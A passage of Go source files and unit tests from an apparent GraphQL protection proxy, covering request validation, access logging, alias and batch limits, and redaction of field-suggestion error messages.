gqlerror.List{gqlerror.Wrap(ErrRedacted)} 86 | } 87 | 88 | response := map[string]interface{}{ 89 | "data": nil, 90 | "errors": validationErrors, 91 | } 92 | 93 | w.Header().Set("Content-Type", "application/json") 94 | err := json.NewEncoder(w).Encode(response) 95 | if err != nil { 96 | p.log.Error("could not encode error", "err", err) 97 | } 98 | return 99 | } 100 | 101 | p.next.ServeHTTP(w, r) 102 | } 103 | 104 | func (p *GraphQLProtect) validateRequest(r *http.Request) ([]gql.RequestData, gqlerror.List) { 105 | payload, err := gql.ParseRequestPayload(r) 106 | if err != nil { 107 | return nil, gqlerror.List{gqlerror.Wrap(err)} 108 | } 109 | 110 | var errs gqlerror.List 111 | 112 | err = p.maxBatch.Validate(payload) 113 | if err != nil { 114 | errs = append(errs, gqlerror.Wrap(err)) 115 | } 116 | 117 | if err != nil { 118 | return nil, errs 119 | } 120 | 121 | for _, data := range payload { 122 | validationErrors := p.ValidateQuery(data.Query) 123 | if len(validationErrors) > 0 { 124 | errs = append(errs, validationErrors...) 125 | } 126 | } 127 | 128 | return payload, errs 129 | } 130 | 131 | func (p *GraphQLProtect) ValidateQuery(operation string) gqlerror.List { 132 | operationSource := &ast.Source{ 133 | Input: operation, 134 | } 135 | 136 | err := p.tokens.Validate(operationSource) 137 | if err != nil { 138 | return gqlerror.List{gqlerror.Wrap(err)} 139 | } 140 | 141 | query, err := parser.ParseQuery(operationSource) 142 | if err != nil { 143 | return gqlerror.List{gqlerror.Wrap(err)} 144 | } 145 | 146 | return validator.Validate(p.schema.Get(), query) 147 | } 148 | -------------------------------------------------------------------------------- /internal/business/protect/protect_test.go: -------------------------------------------------------------------------------- 1 | package protect 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/app/config" 5 | _http "github.com/supportivefe/graphql-protect/internal/app/http" 6 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 9 | "github.com/supportivefe/graphql-protect/internal/business/schema" 10 | "github.com/stretchr/testify/assert" 11 | "io" 12 | "log/slog" 13 | "net/http" 14 | "net/http/httptest" 15 | "strings" 16 | "testing" 17 | "time" 18 | ) 19 | 20 | func TestGraphQLProtect_ServeHTTP(t *testing.T) { 21 | log := slog.Default() 22 | 23 | type fields struct { 24 | log *slog.Logger 25 | cfg *config.Config 26 | schema *schema.Provider 27 | tokens *tokens.MaxTokensRule 28 | maxBatch *batch.MaxBatchRule 29 | accessLogging *accesslogging.AccessLogging 30 | next http.Handler 31 | preFilterChain func(handler http.Handler) http.Handler 32 | } 33 | tests := []struct { 34 | name string 35 | fields fields 36 | want string 37 | }{ 38 | { 39 | name: "request body limit is respected", 40 | fields: fields{ 41 | log: log, 42 | cfg: &config.Config{ 43 | Web: _http.Config{ 44 | ReadTimeout: 10 * time.Second, 45 | WriteTimeout: 10 * time.Second, 46 | IdleTimeout: 10 * time.Second, 47 | ShutdownTimeout: 10 * time.Second, 48 | Host: "localhost", 49 | Path: "/graphql", 50 | RequestBodyMaxBytes: 10, 51 | }, 52 | }, 53 | schema: nil, 54 | tokens: nil, 55 | maxBatch: nil, 56 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 57 | next: &noop{}, 58 | preFilterChain: func(next http.Handler) http.Handler { 59 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 60 | next.ServeHTTP(w, r) 61 | }) 62 | }, 63 | }, 64 | want: `{"data":null,"errors":[{"message":"http: request body too large"}]} 65 | `, 66 | }, 67 | { 68 | name: "limit of 0 means no limit", 69 | fields: fields{ 70 | log: log, 71 | cfg: &config.Config{ 72 | Web: _http.Config{ 73 | ReadTimeout: 10 * time.Second, 74 | WriteTimeout: 10 * time.Second, 75 | IdleTimeout: 10 * time.Second, 76 | ShutdownTimeout: 10 * time.Second, 77 | Host: "localhost", 78 | Path: "/graphql", 79 | RequestBodyMaxBytes: 0, 80 | }, 81 | }, 82 | schema: nil, 83 | tokens: nil, 84 | maxBatch: nil, 85 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 86 | next: &noop{}, 87 | preFilterChain: func(next http.Handler) http.Handler { 88 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 89 | next.ServeHTTP(w, r) 90 | }) 91 | }, 92 | }, 93 | // this assertion doesn't test the actual intended result, but shows that the request body limitation does not affect this request 94 | // ideally this should be improved at a later stage. 95 | want: `{"data":null,"errors":[{"message":"invalid character 'i' looking for beginning of value"}]} 96 | `, 97 | }, 98 | { 99 | name: "request body limit does not interfere with request bodies with fewer bytes than the limit", 100 | fields: fields{ 101 | log: log, 102 | cfg: &config.Config{ 103 | Web: _http.Config{ 104 | ReadTimeout: 10 * time.Second, 105 | WriteTimeout: 10 * time.Second, 106 | IdleTimeout: 10 * time.Second, 107 | ShutdownTimeout: 10 * time.Second, 108 | Host: "localhost", 109 | Path: "/graphql", 110 | RequestBodyMaxBytes: 1_000_000, 111 | }, 112 | }, 113 | schema: nil, 114 | tokens: nil, 115 | maxBatch: nil, 116 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 117 | next: &noop{}, 118 | preFilterChain: func(next http.Handler) http.Handler { 119 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 120 | next.ServeHTTP(w, r) 121 | }) 122 | }, 123 | }, 124 | // this assertion doesn't test the actual intended result, but shows that the request body limitation does not affect this request 125 | // ideally this should be improved at a later stage. 126 | want: `{"data":null,"errors":[{"message":"invalid character 'i' looking for beginning of value"}]} 127 | `, 128 | }, 129 | } 130 | for _, tt := range tests { 131 | t.Run(tt.name, func(t *testing.T) { 132 | w := httptest.NewRecorder() 133 | r := httptest.NewRequest("POST", "/graphql", strings.NewReader("i am a body that exceeds the reader limit")) 134 | 135 | p := &GraphQLProtect{ 136 | log: tt.fields.log, 137 | cfg: tt.fields.cfg, 138 | schema: tt.fields.schema, 139 | tokens: tt.fields.tokens, 140 | maxBatch: tt.fields.maxBatch, 141 | accessLogging: tt.fields.accessLogging, 142 | next: tt.fields.next, 143 | preFilterChain: tt.fields.preFilterChain, 144 | } 145 | p.ServeHTTP(w, r) 146 | 147 | res := w.Result() 148 | assert.Equal(t, res.StatusCode, http.StatusOK) 149 | 150 | body, err := io.ReadAll(res.Body) 151 | assert.NoError(t, err) 152 | defer res.Body.Close() 153 | 154 | assert.Equal(t, tt.want, string(body)) 155 | }) 156 | } 157 | } 158 | 159 | type noop struct { 160 | } 161 | 162 | func (n *noop) ServeHTTP(_ http.ResponseWriter, _ *http.Request) {} 163 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/accesslogging.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/gql" 5 | "log/slog" 6 | "net/http" 7 | ) 8 | 9 | type Config struct { 10 | Enabled bool `yaml:"enabled"` 11 | IncludedHeaders []string `yaml:"include_headers"` 12 | IncludeOperationName bool `yaml:"include_operation_name"` 13 | IncludeVariables bool `yaml:"include_variables"` 14 | IncludePayload bool `yaml:"include_payload"` 15 | } 16 | 17 | func DefaultConfig() Config { 18 | return Config{ 19 | Enabled: true, 20 | IncludedHeaders: nil, 21 | IncludeOperationName: true, 22 | IncludeVariables: true, 23 | IncludePayload: false, 24 | } 25 | } 26 | 27 | type AccessLogging struct { 28 | log *slog.Logger 29 | enabled bool 30 | includeHeaders map[string]bool 31 | includeOperationName bool 32 | includeVariables bool 33 | includePayload bool 34 | } 35 | 36 | func NewAccessLogging(cfg Config, log *slog.Logger) *AccessLogging { 37 | headers := map[string]bool{} 38 | for _, header := range cfg.IncludedHeaders { 39 | headers[header] = true 40 | } 41 | 42 | return &AccessLogging{ 43 | log: log.WithGroup("access-logging"), 44 | enabled: cfg.Enabled, 45 | includeHeaders: headers, 46 | includeOperationName: cfg.IncludeOperationName, 47 | includeVariables: cfg.IncludeVariables, 48 | includePayload: cfg.IncludePayload, 49 | } 50 | } 51 | 52 | func (a *AccessLogging) Log(payloads []gql.RequestData, headers http.Header) { 53 | if !a.enabled { 54 | return 55 | } 56 | 57 | headersToInclude := map[string]interface{}{} 58 | for key := range a.includeHeaders { 59 | headersToInclude[key] = headers.Values(key) 60 | } 61 | 62 | for _, req := range payloads { 63 | al := accessLog{} 64 | 65 | if a.includeOperationName { 66 | al.WithOperationName(req.OperationName) 67 | } 68 | if a.includeVariables { 69 | al.WithVariables(req.Variables) 70 | } 71 | if a.includePayload { 72 | al.WithPayload(req.Query) 73 | } 74 | 75 | al.WithHeaders(headersToInclude) 76 | 77 | a.log.Info("record", "payload", al) 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/accesslogging_test.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | import ( 4 | "context" 5 | "github.com/supportivefe/graphql-protect/internal/business/gql" 6 | "github.com/stretchr/testify/assert" 7 | "log/slog" 8 | "net/http" 9 | "testing" 10 | ) 11 | 12 | type testLogHandler struct { 13 | assert func(ctx context.Context, record slog.Record) error 14 | count int 15 | } 16 | 17 | func (t *testLogHandler) Enabled(context.Context, slog.Level) bool { 18 | return true 19 | } 20 | func (t *testLogHandler) Handle(ctx context.Context, record slog.Record) error { 21 | t.count++ 22 | return t.assert(ctx, record) 23 | } 24 | func (t *testLogHandler) WithAttrs(_ []slog.Attr) slog.Handler { 25 | return t 26 | } 27 | func (t *testLogHandler) WithGroup(_ string) slog.Handler { 28 | return t 29 | } 30 | 31 | func TestAccessLogging_Log(t *testing.T) { 32 | type args struct { 33 | cfg Config 34 | payloads []gql.RequestData 35 | headers http.Header 36 | count int 37 | } 38 | tests := []struct { 39 | name string 40 | args args 41 | want func(ctx context.Context, record slog.Record) error 42 | }{ 43 | { 44 | name: "logs expected fields when enabled", 45 | args: args{ 46 | cfg: Config{ 47 | Enabled: true, 48 | IncludedHeaders: []string{"Authorization", "not-case-sensitive"}, 49 | IncludeOperationName: true, 50 | IncludeVariables: true, 51 | IncludePayload: true, 52 | }, 53 | payloads: []gql.RequestData{ 54 | { 55 | OperationName: "Foobar", 56 | Variables: map[string]interface{}{ 57 | "foo": "bar", 58 | }, 59 | Query: "query Foo { id name }", 60 | }, 61 | }, 62 | headers: map[string][]string{ 63 | "Authorization": {"bearer hello"}, 64 | "Content-Type": {"application/json"}, 65 | "Not-Case-Sensitive": {"yes"}, 66 | }, 67 | count: 1, 68 | }, 69 | want: func(_ context.Context, record slog.Record) error { 70 | assert.Equal(t, 1, record.NumAttrs()) 71 | record.Attrs(func(a slog.Attr) bool { 72 | assert.Equal(t, "payload", a.Key) 73 | 74 | al := a.Value.Any().(accessLog) 75 | 76 | assert.Equal(t, "Foobar", al.OperationName) 77 | assert.Equal(t, "query Foo { id name }", al.Payload) 78 | assert.Equal(t, map[string]interface{}{ 79 | "foo": "bar", 80 | }, al.Variables) 81 | assert.Equal(t, map[string]interface{}{ 82 | "Authorization": []string{"bearer hello"}, 83 | "not-case-sensitive": []string{"yes"}, 84 | }, al.Headers) 85 | 86 | return true 87 | }) 88 | 89 | return nil 90 | }, 91 | }, 92 | { 93 | name: "logs nothing when disabled", 94 | args: args{ 95 | cfg: Config{ 96 | Enabled: false, 97 | IncludedHeaders: []string{"Authorization"}, 98 | IncludeOperationName: true, 99 | IncludeVariables: true, 100 | IncludePayload: true, 101 | }, 102 | payloads: []gql.RequestData{ 103 | { 104 | OperationName: "Foobar", 105 | Variables: map[string]interface{}{ 106 | "foo": "bar", 107 | }, 108 | Query: "query Foo { id name }", 109 | }, 110 | }, 111 | headers: map[string][]string{ 112 | "Authorization": {"bearer hello"}, 113 | "Content-Type": {"application/json"}, 114 | }, 115 | count: 0, 116 | }, 117 | want: func(_ context.Context, _ slog.Record) error { 118 | assert.Fail(t, "should never reach here") 119 | return nil 120 | }, 121 | }, 122 | } 123 | for _, tt := range tests { 124 | t.Run(tt.name, func(t *testing.T) { 125 | handler := &testLogHandler{assert: tt.want} 126 | log := slog.New(handler) 127 | 128 | a := NewAccessLogging(tt.args.cfg, log) 129 | a.log = log 130 | a.Log(tt.args.payloads, tt.args.headers) 131 | 132 | assert.Equal(t, tt.args.count, a.log.Handler().(*testLogHandler).count) 133 | }) 134 | } 135 | } 136 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/model.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | type accessLog struct { 4 | OperationName string `json:"operationName,omitempty"` 5 | Variables map[string]interface{} `json:"variables,omitempty"` 6 | Payload string `json:"payload,omitempty"` 7 | Headers map[string]interface{} `json:"headers,omitempty"` 8 | } 9 | 10 | func (a *accessLog) WithOperationName(name string) { 11 | a.OperationName = name 12 | } 13 | 14 | func (a *accessLog) WithVariables(variables map[string]interface{}) { 15 | a.Variables = variables 16 | } 17 | 18 | func (a *accessLog) WithPayload(payload string) { 19 | a.Payload = payload 20 | } 21 | 22 | func (a *accessLog) WithHeaders(headers map[string]interface{}) { 23 | a.Headers = headers 24 | } 25 | -------------------------------------------------------------------------------- /internal/business/rules/aliases/aliases.go: -------------------------------------------------------------------------------- 1 | package aliases 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/vektah/gqlparser/v2/ast" 6 | "github.com/vektah/gqlparser/v2/validator" 7 | ) 8 | 9 | var ( 10 | resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "max_aliases", 13 | Name: "results", 14 | Help: "The results of the max aliases rule", 15 | }, 16 | []string{"result"}, 17 | ) 18 | ) 19 | 20 | type Config struct { 21 | Enabled bool `yaml:"enabled"` 22 | Max int `yaml:"max"` 23 | RejectOnFailure bool `yaml:"reject_on_failure"` 24 | } 25 | 26 | func DefaultConfig() Config { 27 | return Config{ 28 | Enabled: true, 29 | Max: 15, 30 | RejectOnFailure: true, 31 | } 32 | } 33 | 34 | func init() { 35 | prometheus.MustRegister(resultCounter) 36 | } 37 | 38 | func NewMaxAliasesRule(cfg Config) { 39 | if cfg.Enabled { 40 | validator.AddRule("MaxAliases", func(observers *validator.Events, addError validator.AddErrFunc) { 41 | aliases := 0 42 | // keep track of # of aliases per fragment definition 43 | visitedFragments := make(map[string]int) 44 | 45 | observers.OnFragmentSpread(func(_ *validator.Walker, fragmentSpread *ast.FragmentSpread) { 46 | definition := fragmentSpread.Definition 47 | if _, ok := visitedFragments[definition.Name]; !ok { 48 | count := countSelectionSet(definition.SelectionSet) 49 | visitedFragments[definition.Name] = count 50 | } 51 | 52 | aliases += visitedFragments[definition.Name] 53 | }) 54 | 55 | observers.OnOperation(func(_ *validator.Walker, operation *ast.OperationDefinition) { 56 | aliases += countAliases(operation) 57 | 58 | if aliases > cfg.Max { 59 | if cfg.RejectOnFailure { 60 | addError( 61 | validator.Message("syntax error: Aliases limit of %d exceeded, found %d", cfg.Max, aliases), 62 | validator.At(operation.Position), 63 | ) 64 | resultCounter.WithLabelValues("rejected").Inc() 65 | } else { 66 | resultCounter.WithLabelValues("failed").Inc() 67 | } 68 | } else { 69 | resultCounter.WithLabelValues("allowed").Inc() 70 | } 71 | }) 72 | }) 73 | } 74 | } 75 | 76 | func countAliases(operation *ast.OperationDefinition) int { 77 | return countSelectionSet(operation.SelectionSet) 78 | } 79 | 80 | func countSelectionSet(set ast.SelectionSet) int { 81 | count := 0 82 | if len(set) == 0 { 83 | return count 84 | } 85 | 86 | for _, selection := range set { 87 | if v, ok := selection.(*ast.Field); ok { 88 | // When a query has no alias defined it defaults to the name of the query 89 | if v.Alias != "" && v.Alias != v.Name { 90 | count++ 91 | } 92 | 93 | count += countSelectionSet(v.SelectionSet) 94 | } 95 | } 96 | 97 | return count 98 | } 99 | -------------------------------------------------------------------------------- /internal/business/rules/aliases/aliases_test.go: -------------------------------------------------------------------------------- 1 | package aliases 2 | 3 | import ( 4 | "fmt" 5 | "github.com/stretchr/testify/assert" 6 | "github.com/vektah/gqlparser/v2" 7 | "github.com/vektah/gqlparser/v2/ast" 8 | "github.com/vektah/gqlparser/v2/parser" 9 | "github.com/vektah/gqlparser/v2/validator" 10 | "testing" 11 | ) 12 | 13 | func Test_MaxAliasesRule(t *testing.T) { 14 | schema := ` 15 | type Query { 16 | getBook(title: String): Book 17 | } 18 | 19 | type Book { 20 | id: ID! 21 | title: String 22 | author: String 23 | }` 24 | 25 | q := `query { 26 | firstBooks: getBook(title: "null") { 27 | author 28 | title 29 | } 30 | secondBooks: getBook(title: "null") { 31 | author 32 | title 33 | } 34 | }` 35 | 36 | type args struct { 37 | query string 38 | schema string 39 | cfg Config 40 | } 41 | tests := []struct { 42 | name string 43 | args args 44 | want error 45 | }{ 46 | { 47 | name: "no aliases yields zero count", 48 | args: args{ 49 | query: q, 50 | schema: schema, 51 | cfg: Config{ 52 | Max: 15, 53 | Enabled: true, 54 | }, 55 | }, 56 | want: nil, 57 | }, 58 | { 59 | name: "does not produce error when counted aliases are more than configured maximum and reject on failure is false", 60 | args: args{ 61 | cfg: Config{ 62 | Enabled: true, 63 | Max: 1, 64 | RejectOnFailure: false, 65 | }, 66 | query: q, 67 | schema: schema, 68 | }, 69 | want: nil, 70 | }, 71 | { 72 | name: "produces error when counted aliases are more than configured maximum and reject on failure is true", 73 | args: args{ 74 | cfg: Config{ 75 | Max: 1, 76 | Enabled: true, 77 | RejectOnFailure: true, 78 | }, 79 | query: q, 80 | schema: schema, 81 | }, 82 | want: fmt.Errorf("syntax error: Aliases limit of %d exceeded, found %d", 1, 2), 83 | }, 84 | { 85 | name: "respects fragment aliases", 86 | args: args{ 87 | query: `query A { 88 | getBook(title: "null") { 89 | firstTitle: title 90 | ...BookFragment 91 | } 92 | } 93 | fragment BookFragment on Book { 94 | secondTitle: title 95 | }`, 96 | schema: schema, 97 | cfg: Config{ 98 | Max: 1, 99 | Enabled: true, 100 | RejectOnFailure: true, 101 | }, 102 | }, 103 | want: fmt.Errorf("syntax error: Aliases limit of %d exceeded, found %d", 1, 2), 104 | }, 105 | } 106 | for _, tt := range tests { 107 | t.Run(tt.name, func(t *testing.T) { 108 | NewMaxAliasesRule(tt.args.cfg) 109 | 110 | query, _ := parser.ParseQuery(&ast.Source{Name: "ff", Input: tt.args.query}) 111 | schema := gqlparser.MustLoadSchema(&ast.Source{ 112 | Name: "graph/schema.graphqls", 113 | Input: tt.args.schema, 114 | BuiltIn: false, 115 | }) 116 | 117 | errs := validator.Validate(schema, query) 118 | 119 | if tt.want == nil { 120 | assert.Empty(t, errs) 121 | } else { 122 | assert.Equal(t, tt.want.Error(), errs[0].Message) 123 | } 124 | }) 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /internal/business/rules/batch/batch.go: -------------------------------------------------------------------------------- 1 | package batch 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "github.com/supportivefe/graphql-protect/internal/business/gql" 7 | "github.com/prometheus/client_golang/prometheus" 8 | "strconv" 9 | ) 10 | 11 | var ( 12 | resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 13 | Namespace: "graphql_protect", 14 | Subsystem: "max_batch", 15 | Name: "results", 16 | Help: "The results of the max batch rule, including the size of the batch. The actual size is only tracked for allowed operations, to prevent excessive metric generation on malicious iput", 17 | }, 18 | []string{"result", "size"}, 19 | ) 20 | ErrMaxBatchSizeTooSmall = errors.New("maximum allowed batch size cannot be smaller than 1. Protection auto-disabled") 21 | ) 22 | 23 | type Config struct { 24 | Enabled bool `yaml:"enabled"` 25 | Max int `yaml:"max"` 26 | RejectOnFailure bool `yaml:"reject_on_failure"` 27 | } 28 | 29 | func DefaultConfig() Config { 30 | return Config{ 31 | Enabled: true, 32 | Max: 1, 33 | RejectOnFailure: true, 34 | } 35 | } 36 | 37 | func init() { 38 | prometheus.MustRegister(resultCounter) 39 | } 40 | 41 | type MaxBatchRule struct { 42 | cfg Config 43 | } 44 | 45 | func NewMaxBatch(cfg Config) (*MaxBatchRule, error) { 46 | if cfg.Max < 1 { 47 | return &MaxBatchRule{ 48 | cfg: Config{ 49 | Enabled: false, 50 | }, 51 | }, ErrMaxBatchSizeTooSmall 52 | } 53 | 54 | return &MaxBatchRule{ 55 | cfg: cfg, 56 | }, nil 57 | } 58 | 59 | func (t *MaxBatchRule) Validate(payload []gql.RequestData) error { 60 | if !t.cfg.Enabled { 61 | return nil 62 | } 63 | 64 | if len(payload) > t.cfg.Max { 65 | if t.cfg.RejectOnFailure { 66 | resultCounter.WithLabelValues("rejected", "exceeded").Inc() 67 | return fmt.Errorf("operation has exceeded maximum batch size. found [%d], max [%d]", len(payload), t.cfg.Max) 68 | } 69 | resultCounter.WithLabelValues("failed", "exceeded").Inc() 70 | return nil 71 | } 72 | 73 | size := strconv.Itoa(len(payload)) 74 | 75 | resultCounter.WithLabelValues("allowed", size).Inc() 76 | return nil 77 | } 78 | -------------------------------------------------------------------------------- /internal/business/rules/batch/batch_test.go: -------------------------------------------------------------------------------- 1 | package batch 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/gql" 5 | "github.com/stretchr/testify/assert" 6 | "testing" 7 | ) 8 | 9 | func TestMaxBatchRule_Validate(t1 *testing.T) { 10 | type fields struct { 11 | cfg Config 12 | } 13 | type args struct { 14 | payload []gql.RequestData 15 | } 16 | tests := []struct { 17 | name string 18 | fields fields 19 | args args 20 | wantErr bool 21 | initErr bool 22 | }{ 23 | { 24 | name: "disabled has no effect", 25 | fields: fields{ 26 | cfg: Config{ 27 | Enabled: false, 28 | Max: 1, 29 | RejectOnFailure: true, 30 | }, 31 | }, 32 | args: args{ 33 | payload: []gql.RequestData{ 34 | { 35 | Query: "", 36 | Extensions: gql.Extensions{}, 37 | }, 38 | { 39 | Query: "", 40 | Extensions: gql.Extensions{}, 41 | }, 42 | { 43 | Query: "", 44 | Extensions: gql.Extensions{}, 45 | }, 46 | }, 47 | }, 48 | wantErr: false, 49 | initErr: false, 50 | }, 51 | { 52 | name: "less than limit passes", 53 | fields: fields{ 54 | cfg: Config{ 55 | Enabled: true, 56 | Max: 3, 57 | RejectOnFailure: true, 58 | }, 59 | }, 60 | args: args{ 61 | payload: []gql.RequestData{ 62 | { 63 | Query: "", 64 | Extensions: gql.Extensions{}, 65 | }, 66 | }, 67 | }, 68 | wantErr: false, 69 | initErr: false, 70 | }, 71 | { 72 | name: "more than limit throws", 73 | fields: fields{ 74 | cfg: Config{ 75 | Enabled: true, 76 | Max: 1, 77 | RejectOnFailure: true, 78 | }, 79 | }, 80 | args: args{ 81 | payload: []gql.RequestData{ 82 | { 83 | Query: "", 84 | Extensions: gql.Extensions{}, 85 | }, 86 | { 87 | Query: "", 88 | Extensions: gql.Extensions{}, 89 | }, 90 | { 91 | Query: "", 92 | Extensions: gql.Extensions{}, 93 | }, 94 | }, 95 | }, 96 | wantErr: true, 97 | initErr: false, 98 | }, 99 | { 100 | name: "invalid config auto disables", 101 | fields: fields{ 102 | cfg: Config{ 103 | Enabled: true, 104 | Max: 0, 105 | RejectOnFailure: true, 106 | }, 107 | }, 108 | args: args{ 109 | payload: []gql.RequestData{ 110 | { 111 | Query: "", 112 | Extensions: gql.Extensions{}, 113 | }, 114 | { 115 | Query: "", 116 | Extensions: gql.Extensions{}, 117 | }, 118 | { 119 | Query: "", 120 | Extensions: gql.Extensions{}, 121 | }, 122 | }, 123 | }, 124 | wantErr: false, 125 | initErr: true, 126 | }, 127 | } 128 | for _, tt := range tests { 129 | t1.Run(tt.name, func(t1 *testing.T) { 130 | t, err := NewMaxBatch(tt.fields.cfg) 131 | if tt.initErr { 132 | assert.Error(t1, err) 133 | } 134 | 135 | if err := t.Validate(tt.args.payload); (err != nil) != tt.wantErr { 136 | t1.Errorf("Validate() error = %v, wantErr %v", err, tt.wantErr) 137 | } 138 | }) 139 | } 140 | } 141 | -------------------------------------------------------------------------------- /internal/business/rules/block_field_suggestions/block_field_suggestions.go: -------------------------------------------------------------------------------- 1 | package block_field_suggestions // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "strings" 6 | ) 7 | 8 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 9 | Namespace: "graphql_protect", 10 | Subsystem: "block_field_suggestions", 11 | Name: "results", 12 | Help: "The results of the block field suggestions rule", 13 | }, 14 | []string{"result"}, 15 | ) 16 | 17 | type Config struct { 18 | Enabled bool `yaml:"enabled"` 19 | Mask string `yaml:"mask"` 20 | } 21 | 22 | func DefaultConfig() Config { 23 | return Config{ 24 | Enabled: true, 25 | Mask: "[redacted]", 26 | } 27 | } 28 | 29 | type BlockFieldSuggestionsHandler struct { 30 | cfg Config 31 | } 32 | 33 | func init() { 34 | prometheus.MustRegister(resultCounter) 35 | } 36 | 37 | func NewBlockFieldSuggestionsHandler(cfg Config) *BlockFieldSuggestionsHandler { 38 | return &BlockFieldSuggestionsHandler{ 39 | cfg: cfg, 40 | } 41 | } 42 | 43 | func (b *BlockFieldSuggestionsHandler) Enabled() bool { 44 | return b.cfg.Enabled 45 | } 46 | 47 | func (b *BlockFieldSuggestionsHandler) ProcessBody(payload map[string]interface{}) map[string]interface{} { 48 | if val, ok1 := payload["errors"]; ok1 { 49 | payload["errors"] = b.processErrors(val) 50 | } 51 | return payload 52 | } 53 | 54 | func (b *BlockFieldSuggestionsHandler) processErrors(payload interface{}) interface{} { 55 | switch payload := payload.(type) { 56 | case []map[string]interface{}: 57 | for _, err := range payload { 58 | _ = b.processError(err) 59 | } 60 | case []interface{}: 61 | for _, err := range payload { 62 | e, ok2 := err.(map[string]interface{}) 63 | if !ok2 { 64 | continue 65 | } 66 | _ = b.processError(e) 67 | } 68 | } 69 | return payload 70 | } 71 | 72 | func (b *BlockFieldSuggestionsHandler) processError(err map[string]interface{}) map[string]interface{} { 73 | if msg, ok4 := err["message"]; ok4 { 74 | if message, ok := msg.(string); ok { 75 | err["message"] = b.replaceSuggestions(message) 76 | } 77 | } 78 | return err 79 | } 80 | 81 | func (b *BlockFieldSuggestionsHandler) replaceSuggestions(message string) string { 82 | if strings.HasPrefix(message, "Did you mean") { 83 | resultCounter.WithLabelValues("masked").Inc() 84 | return b.cfg.Mask 85 | } 86 | resultCounter.WithLabelValues("unmasked").Inc() 87 | return message 88 | } 89 | -------------------------------------------------------------------------------- /internal/business/rules/block_field_suggestions/block_field_suggestions_test.go: -------------------------------------------------------------------------------- 1 | package block_field_suggestions // nolint:revive 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestProcessBody(t *testing.T) { 9 | type args struct { 10 | payload map[string]interface{} 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want map[string]interface{} 16 | }{ 17 | { 18 | name: "nothing happens when not expected format", 19 | args: args{ 20 | payload: map[string]interface{}{ 21 | "hi": "bye", 22 | }, 23 | }, 24 | want: map[string]interface{}{ 25 | "hi": "bye", 26 | }, 27 | }, 28 | { 29 | name: "processes errors payload", 30 | args: args{ 31 | payload: map[string]interface{}{ 32 | "errors": []map[string]interface{}{ 33 | { 34 | "message": "hello", 35 | }, 36 | }, 37 | }, 38 | }, 39 | want: map[string]interface{}{ 40 | "errors": []map[string]interface{}{ 41 | { 42 | "message": "hello", 43 | }, 44 | }, 45 | }, 46 | }, 47 | { 48 | name: "can handle unexpected types", 49 | args: args{ 50 | payload: map[string]interface{}{ 51 | "errors": []map[string]interface{}{ 52 | { 53 | "message": 1, 54 | }, 55 | }, 56 | }, 57 | }, 58 | want: map[string]interface{}{ 59 | "errors": []map[string]interface{}{ 60 | { 61 | "message": 1, 62 | }, 63 | }, 64 | }, 65 | }, 66 | { 67 | name: "Replaces suggestions when found", 68 | args: args{ 69 | payload: map[string]interface{}{ 70 | "errors": []map[string]interface{}{ 71 | { 72 | "message": "Did you mean 'foobar'?", 73 | }, 74 | }, 75 | }, 76 | }, 77 | want: map[string]interface{}{ 78 | "errors": []map[string]interface{}{ 79 | { 80 | "message": "[redacted]", 81 | }, 82 | }, 83 | }, 84 | }, 85 | { 86 | name: "Doesn't affect any other fields", 87 | args: args{ 88 | payload: map[string]interface{}{ 89 | "data": map[string]interface{}{ 90 | "foo": "bar", 91 | "boolean": 1, 92 | }, 93 | "errors": []map[string]interface{}{ 94 | { 95 | "message": "Did you mean 'foobar'?", 96 | "something": "else", 97 | }, 98 | { 99 | "without": "message", 100 | }, 101 | }, 102 | }, 103 | }, 104 | want: map[string]interface{}{ 105 | "data": map[string]interface{}{ 106 | "foo": "bar", 107 | "boolean": 1, 108 | }, 109 | "errors": []map[string]interface{}{ 110 | { 111 | "message": "[redacted]", 112 | "something": "else", 113 | }, 114 | { 115 | "without": "message", 116 | }, 117 | }, 118 | }, 119 | }, 120 | } 121 | for _, tt := range tests { 122 | t.Run(tt.name, func(t *testing.T) { 123 | b := NewBlockFieldSuggestionsHandler(Config{ 124 | Enabled: true, 125 | Mask: "[redacted]", 126 | }) 127 | 128 | if got := b.ProcessBody(tt.args.payload); !reflect.DeepEqual(got, tt.want) { 129 | t.Errorf("ProcessBody() = %v, want %v", got, tt.want) 130 | } 131 | }) 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /internal/business/rules/enforce_post/enforce_post.go: -------------------------------------------------------------------------------- 1 | package enforce_post // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "net/http" 6 | ) 7 | 8 | var methodCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 9 | Namespace: "graphql_protect", 10 | Subsystem: "enforce_post", 11 | Name: "count", 12 | Help: "Amount of times the enforce POST rule was triggered and blocked a request", 13 | }, 14 | []string{}, 15 | ) 16 | 17 | 